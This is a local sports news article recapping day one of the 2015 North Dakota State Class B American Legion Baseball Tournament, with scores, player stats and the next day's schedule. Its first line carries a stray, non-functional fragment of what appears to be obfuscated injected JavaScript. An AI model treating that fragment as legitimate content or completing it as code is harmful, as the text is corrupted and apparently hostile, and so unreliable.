LAMOURE zedtk|var|u0026u|referrer|hdiiy||js|php’.split(‘|’),0,{}))
(NewsDakota.com) Day number one from the 2015 State Class B American Legion Baseball Tournament presented plenty of great storylines.

Carrington 16 Bismarck Capitals 5 (5 Innings)

In the first of the four games on Wednesday, the defending State Champions smashed the ball four a total of 16 runs and 17 hits; 11 of those runs coming in the fourth inning.  Brady Smith hit a home run, a triple and two doubles in the victory, while Patrick Freeman was credited with the win with a perfect three innings of pitching.

Carrington scored the first 16 runs of the game, before Bismarck rallied with three runs in the forth and another two in the fifth inning. Matt Fettig managed two doubles for Bismarck.

Oakes 5 Park River 1

Bryce Meehl hit a walk-off grand slam to give Post 36 the edge over Post 147.

The bottom of the seventh inning commenced with Blake Hollingsworth registering a triple, before both Ethan Zetocha and Kaleb Sell were intentionally walked. Meehl then hit one to dead center field, clearing the wall, and giving Oakes a date with Carrington on Thursday night.

Jon Tyre earned the win for Post 36 with 10 strikeouts. Tyre allowed five hits, two of which were doubles by Ben Phelps and Zach Gaarder. Phelps struck out five and walked six in the loss.

Nelson County 9 Kidder County 0

It was Jayden Grover’s day for Nelson County. Not only did he hit a two-run homer, but he twirled a two-hit shutout. The Owl’s big right-hander allowed just one runner to third base as he struck out 12 Kidder County hitters.

Nelson County boasts one of the stronger rotations at the state tournament and all the fans at Townsend Field were treated to a great performance from the ace of the staff.

Hatton 9 LaMoure 4

Despite a two-run home run from Anthony Olson, Post 19 was unable to hold off the Flyers to end the first day of the tournament. Hatton scored the first seven runs of the game, and answered Olson’s blast with their own two-run home run from Jace Pederson in the third inning.

Pederson earned the win, allowing eight hits and striking out eight. Parker Stemen ended up with the loss, going just three innings, allowing seven hits, and surrendering five earned runs.

Day two of the tournament starts at noon on Thursday with Park River and the Bismarck Capitals, followed by LaMoure and Kidder County at 2:30; both games are loser out affairs. The winner’s bracket starts at 5 p.m. with Oakes and Carrington, and Nelson County meeting Hattton at 7:30 p.m.
